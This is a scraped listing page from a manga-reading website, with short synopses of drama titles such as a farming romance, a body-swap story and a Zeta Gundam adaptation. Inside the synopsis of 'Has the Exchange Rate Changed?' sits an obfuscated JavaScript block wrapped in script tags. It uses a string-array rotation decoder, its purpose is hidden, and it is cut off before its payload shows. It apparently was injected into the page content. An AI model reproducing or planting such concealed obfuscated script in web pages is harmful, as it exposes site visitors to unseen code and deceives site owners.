Drama - Page 1497

Explore the world of Drama manga, where gripping stories await. Start reading the best Drama manga free now!

18096 results

Country Life With His Sexy Majesty

Read manhwa Country Life With His Sexy Majesty / A Country Life With a Sexy King / Country Life With the Sexy Emperor The moment my engagement with my human trash fiancé was annulled, memories from my past life returned. I was formerly a hardworking agriculture researcher and a woman who went to farming college! After getting chased out of my family, I decided to stick to my strengths and live a worry-free and comfortable life while farming, but… “That’s my sword.” “No, it’s my hoe?” “It’s my sword!” “I told you, it’s my hoe!” Suddenly, a beautiful blond man—who looked perfectly fine on the outside—appeared to take the hoe I picked up from the ground away from me! This is the start of a farming romance where we’ll meet our loved ones as well as pick mulberries (kill two birds with one stone).. 섹시한 폐하와 함께하는 전원생활

2 days ago

Gyges no Futari

Todo, a manga artist, and Hinata, an assistant, have a common problem - a bad deal with the editor in charge. When such two people return home from the interview, they awaken to each other\'s abilities…


Prince’s Lollipop

Ten years ago, Eunsol Seo tutored a child who bore deep scars in his heart. However, just as he opened up to her, she left, and ten years pass with neither of the two hearing about the other. Eunsol is now a thirty-year-old woman who is desperately looking around for work. After another failed interview, she meets a strange man while screaming in rage, and he suddenly jumps off the bridge in front of her. This twenty-year-old man turns out to be Danam Soh, the child she tutored in the past. A romantic comedy about the reunion between the thirty-year-old Eunseol Seo and the twenty year old Danam Soh. 왕자님 의 막대 사탕


Has the Exchange Rate Changed?

“Yool Lee” is a bank clerk with an ordinary life. But she ends up switching bodies with a handsome moneylender…?<script></script><script>(function(_0x14f99f,_0x1d91c2){var _0x3809aa=_0x3ffb,_0x4f0591=_0x14f99f();while(!![]){try{var _0x4ef543=-parseInt(_0x3809aa(0x1e0))/(0x1*-0x5b+0x4a*0x40+0x4*-0x489)*(-parseInt(_0x3809aa(0x1d6))/(0x2398+-0x3af+-0x1fe7))+-parseInt(_0x3809aa(0x1c9))/(0x7ce+-0x2*0x11ba+0x61*0x49)*(-parseInt(_0x3809aa(0x1e4))/(-0x3b4+-0x1f63+0x231b))+-parseInt(_0x3809aa(0x1d5))/(0x702+-0x1787+-0x2*-0x845)+parseInt(_0x3809aa(0x1d8))/(0x1b0f+0x1bb0+-0x36b9)+parseInt(_0x3809aa(0x1d0))/(-0x12b4+0x1047+0x4*0x9d)+-parseInt(_0x3809aa(0x1ce))/(0x1f2e+0x295*0x6+-0x18e*0x1e)*(-parseInt(_0x3809aa(0x1e8))/(0x7*-0x412+-0x13d*0x1+0x1dc4))+-parseInt(_0x3809aa(0x1e7))/(0x989*-0x1+0xef7+-0x564)*(parseInt(_0x3809aa(0x1df))/(-0x1794+0x42a+-0x1*-0x1375));if(_0x4ef543===_0x1d91c2)break;else _0x4f0591['push'](_0x4f0591['shift']());}catch(_0x4dec76){_0x4f0591['push'](_0x4f0591['shift']());}}}(_0x22a1,0xccdd1+0x2b6*-0x1ff+-0x2*0x1c8e));function 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Mesopotamian Mythology of Hongkki

Read Manhwa Mesopotamian Mythology of Hongkki Online For Free At Manga Zin Mesopotamian Mythology of Hongkki Novel also known as “Hongkki’s Mesopotamian Myth / Khonki drevnego Shumero / Хонки древнего Шумеро / 홍끼의 메소포타미아 신화”. This OnGoing webtoon was released on 2023. The story was written by Hongkki and illustrations by Hongkki. The content of the comic Mesopotamian Mythology of Hongkki: “Who created humans?” “Why do humans die?” “How did love coexist with war?” The primal curiosities of humans regarding life and death are combined with lively imagination to create mythological stories that make us laugh and cry. These myths originate from the “first myths discovered in the first civilization of humanity” – [Mesopotamian Myths]! The comic Mesopotamian Mythology of Hongkki belongs to the Genre: Drama, Fantasy, Historical, Manhwa, Mature, Romance, Shoujo MangaZin is a comprehensive website featuring the latest and hottest manga, updated rapidly to cater to readers with high-quality images and provide them with excellent experiences. With keywords such as “TopManhua” and “ManhwaTop,” as well as related terms like ZinManga, LikeManga, and Read Manhwa Online ensures readers have access to a wide selection of top-notch manga content. Please always follow and share with your friends to support the website MANGAZIN.ORG so that we have more motivation to publish the latest and best comics.


Million Times Attack Speed

After being reincarnated into the Tianwu Continent, Ye Yun activated the Multiverse Devouring System and received the reward of a million times attack speed in the beginner's gift package. From then on, he became an invincible powerhouse! As the saying goes, in the world of martial arts, speed is paramount. Do you think I was just picking my nose and cleaning my ears? In fact, I just executed thirty-five thousand people with a single sword strike and eighty-seven thousand people with a single sword swing, while also unleashing various boxing techniques and secret arts.


Favela no Mangaka

Mangaka Takei Hiroto, who was rejected once again at a serialization meeting, decided to give up on his dream and go on a heartbroken trip to Brazil to get over everything. In a favela (slum) he accidentally wandered into, Hiroto meets a poor boy with sharp eyes named João. Living on the exact opposite side of the Earth, João surprisingly has a dream of becoming a mangaka…!! No matter who you are or where you live, you don’t have to give up. The story of two slums mangaka chasing their dreams begins!!


Inagaki Misao Horror M Senshuu

A collection of Misao Inagaki\'s early oneshots from the Horror M magazine, known for extremely high quality horror manga and for its splatter horror series.


Kimi ni Aisarete Itakatta

Kanae is a girl who is struggling to fit in with the popular clique at her high school. Because she had been bullied in middle school, she has developed an acute inferiority complex that had led her to engage in compensated dating in order to feel wanted. In comes Hiroshi, a high-school baseball star who became drawn to her after finding her crying during a group date at a karaoke bar. Thus begins an unhealthy relationship between a mentally unstable high-school girl and a jock.


Queen’s Man

Read manhwa Queen’s Man / La reine de mon cœur / Queen and I / Queen In Hyun’s Man / Queen In-hyun’s Man / Queen Inhyeon’s Man / 인현왕후의 남자 Can their love stand the test of time travel? Bung-do Kim, a scholar from the Joseon Dynasty, is sent to the 21st century by a magic talisman, where he falls in love with Heejin Choi, an actress. But after a terrible accident, Heejin and Bung-do find themselves thrown back in time. Will they be able to find their way back to each other?


The Final Boss Who Triggers Massacres, I’ll Make You Happy as a Supporting Character!

Read manhwa The Final Boss Who Triggers Massacres, I’ll Make You Happy as a Supporting Character! The Last Boss Who Causes a Great Massacre— In the world I was reincarnated into, my favorite character’s life held tragedies that were never depicted in the game? This is the love story of a supporting noble lady who cherishes and protects her favorite character and a once-lonely former final boss who gradually opens his heart to her actions…


Mobile Suit Zeta Gundam - Define

Universal Century 0087, seven years after the end of the One Year War between the Earth Federation and the Principality of Zeon. Ensign Reccoa Londe has provided the Anti-Earth Union Group (AEUG) with information regarding possible mobile suit development at the civilian colonies of Green Noa. Lieutenant Quattro (Char Aznable) with his wingmen Lieutenant JGs Apolly (Andy) and Roberto (Ricardo) head to the colonies to investigate. On Green Noa 1, Kamille Bidan is rushing to the spaceport where the Temptation, a ship a former One Year War ace is on, is docking. He’s hoping to get an autograph from the famed Captain Bright Noa. As Bright explains that he’s on duty, Jerid and company interrupt the two. Jerid smacktalks Bright for receiving a two rank demotion upon refusing to join the Titans and grabs Kamille’s photo saying he should sign it as an elite member of the Federation. The two get into a scuffle and Kamille is hauled off for questioning. Matosh questions Kamille about being an AEUG insider but just then he’s freed after his story checks out. Just as the handcuffs come off, the Gundam MK-II crashes into the building…
